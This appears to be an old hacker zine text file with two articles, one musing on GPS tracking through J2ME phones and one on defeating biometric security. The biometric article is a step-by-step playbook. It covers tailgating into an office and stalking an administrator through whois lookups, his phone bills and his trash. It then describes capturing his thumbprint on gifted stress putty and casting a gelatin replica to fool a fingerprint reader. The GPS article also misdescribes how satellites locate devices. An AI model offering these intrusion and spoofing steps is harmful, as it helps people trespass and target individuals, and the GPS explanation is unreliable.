This article will deal mainly with the JAVA 2 MICRO EDITION (J2ME)
programming language, developed by Sun Mircosystems as a JAVA variant
for wireless devices, and its potential for location determination
services. I plan to update this article as more information on the
subject becomes available publicly.
Global Positioning.
----------------------------------------------------------------------
GPS (the Global Positioning System) was originally developed for the
US military and funded by the US Department of Defence. Basically
a series of 24 satellites orbit the earth at a rate of one rotation
(orbit) every 12 hours. Their functions consist of A) recieving
request transmitions from ground units (any GPS capable unit inside
the GPS satellite matrix). B) Determining the global coordinates of
the the ground unit using a complex system of linking 3 satellites (4
when a TIME request is made as well) to triangulate the units
position. And c) to transmit the data back to the ground unit,
accounting for any ionospheric interference.
GPS and Wireless Devices.
----------------------------------------------------------------------
The market for GPS capable cellphone/pda chipsets has increased ten-
fold since last November when the FCC passed legislature containing
mandatory deadlines for the implementation of the technology. Soon all
wireless devices will contain GPS chips.
J2ME and GPS.
----------------------------------------------------------------------
J2ME is the leading wireless application developement language. When
used in conjunction with the NMEA protocol, a data transmission
protocol used by GPS units, we have some interesting potential for
location determination.
Technical Notes, for the curious: data sent via the NMEA protocol
must conform to the following standards: Data is sent as
ASCII, begins with a dollar sign ($) followed by GP, uses
a comma (,) delimiter. For more information, try the NMEA FAQ.
LocatioNet, 11 year veteran of the location based services area of the
wireless communication field, and gate5, a mobile internet application
developement company, have recently combined their efforts in
developing the zone5 engine. Its basically an enhanced version of
LocatioNet's GIS engine that includes, among many other things,
mechanisms for location determination and on-the-fly vector map
generation. What a brave new world we live in.
Pro's and Con's.
----------------------------------------------------------------------
In the shadow of the 9/11 tragedy, public safety is a bigger issue
than ever before. People are learning to sacrifice their civil
liberties for the safety of the status quo (ie the Patriot Act).
Location Determination has the potential to be a great device for
insuring public safety in a wide variety of ways. This is a definate
pro. But its this that frightens me. A single transmition from any
wireless device (remember, the FCC made this a LAW) can transmit the
*exact coordinates of any cellphone/pda's position on the planet to
any other device that requests it in a compact and easily decoded
form. This carries an unsettling air of Orwellian possibility.
* - the positioning capabilities of GPS are not exact, the predictable
accuracy is as follows: 22 meter horizontal, 27.7 meter vertical.
Obviously the GIS/zone5 engines are both proprietary, but its quite
conceivable that some ingenious 16 year old coder will develop a
client/server application using J2ME/NMEA and release the client as
a trojan-type email attachment... He could know where you're standing.
----------------------------------------------------------------------
greets: savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny,
turb, joja. You'll all have to bear with me, its been a hectic
month.
######################################################################
############ Biometric Security Basics -by dropcode ############
######################################################################
Intro.
----------------------------------------------------------------------
Biometrics is the study of physiological traits by which a human being
can be recognized. Examples include voice pattern detection, retina
and iris scanning, fingerprints, palmprints and hand geometry, etc.
There are various companies and organizations dedicated to this area
of study and as of late quite a few biometric security devices have
been developed for laptop and desktop PCs.
In this article I will cover some of the basic vulnerabilities
presented in various biometric security products.
Abstract.
----------------------------------------------------------------------
Ever forget a password or private pin number? lose a key or an access
card? Then you can probably see the advantages to widespread biometric
security systems. But the same advantages present a few, more subtle,
but very critical vulnerabilities. For instance, if you forget your
password or pin, theres generally a hotline to call or someone to see
to get it changed. If you lose your key? make a new one or change your
locks. But what if someone found a way to copy your palm print? or
mimic your voice? Theres no replacing biometric traits.
Everywhere we go, whenever we do anything we're leaving traces of our
biometric signatures. Fingerprints and palmprints can be lifted from
flat surfaces and recreated efficiently and inexpensively. Hurray :)
....?!
----------------------------------------------------------------------
You're standing outside an office building waiting for the smokers
to come out for their lunch break. You straighten your tie and put on
your best smile.
The door opens and out comes the first wave of people. You light up
and pretend you came out with them. 10 minutes later Judy from
accounting pulls out her access card, opens up the door and you follow
the group back inside.
First things first, you pull out your notebook and look for Jims
office number and floor. If everythings going according to plan, Jims
downstairs at a board meeting. You know this from the memo you found
in the trash bin out back. Jims the administrator for the company
webpage, you pulled his name, address and phonenumber. It wasn't too
difficult, you whoisd the company page at network solutions (thats the
whois server that internic gave you) and you looked up his NIC
handle... that showed you his homepage and you got his infr0 from
his homepages whois record. Anyway, for the last 3 months you've
been getting copies of his phone bill and going through his trash. He
seems like an easy mark: heavy smoker, problems with the ex-wife...
You know how it is to be stressed, so just out of courtesy you sent
him a gift. stress putty. You know, the stuff you squeeze when you
can't keep a train of thought? signed, 'your secret admirer' *smirk*
You step out of the elavator and into his office. There we go, right
on the desk is your putty. You pocket it, along with some extravagant
office supplies, and make your way down to the staff lunch room. Once
there you pull out the gellatine solution you mixed earlier that day
and place it on the thumb print in the stress putty :). Put it in the
lunch room freezer (carefully conceiled somewhere in the back) and
wait about 5 minutes. Tada, perfect replica of Jims thumb.
(the gellatine mixture needs to be really strong 1:1 gellatin to water
ratio should do it.)
Now find a computer somewhere out of the way and use it in the Finger-
print TouchPad (trademark of Synaptics inc). Access. :)
----------------------------------------------------------------------
while most of the pioneering biometric fingerprinting devices are all
optical, (meaning they only care about what a fingerprint looks like)
some of the newer devices (ie capacitive sensors) will make sure that
the finger has some electrical conductance. The optical sensors could
be fooled with silicone fingers, but because silicone doesn't conduct
electricity, the capacitive sensors couldn't. The beauty of the attack
described above is that, gelatine DOES conduct. :D
A common attack against biometric fingerprint scanners utilizing a
method called capacitive resistance is blowing lightly on the unit
shortly after it has been legitamately used. Often, there is enough
natural oil left over to recreate the original print.
The same effect can occur when a small plastic bag of water is pressed
against the unit.
Closing.
----------------------------------------------------------------------
I intend to add to this file as I learn more about biometric tech, but
for now, this will have to do.
----------------------------------------------------------------------
greets: savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny,
turb, joja. I love you guys :D
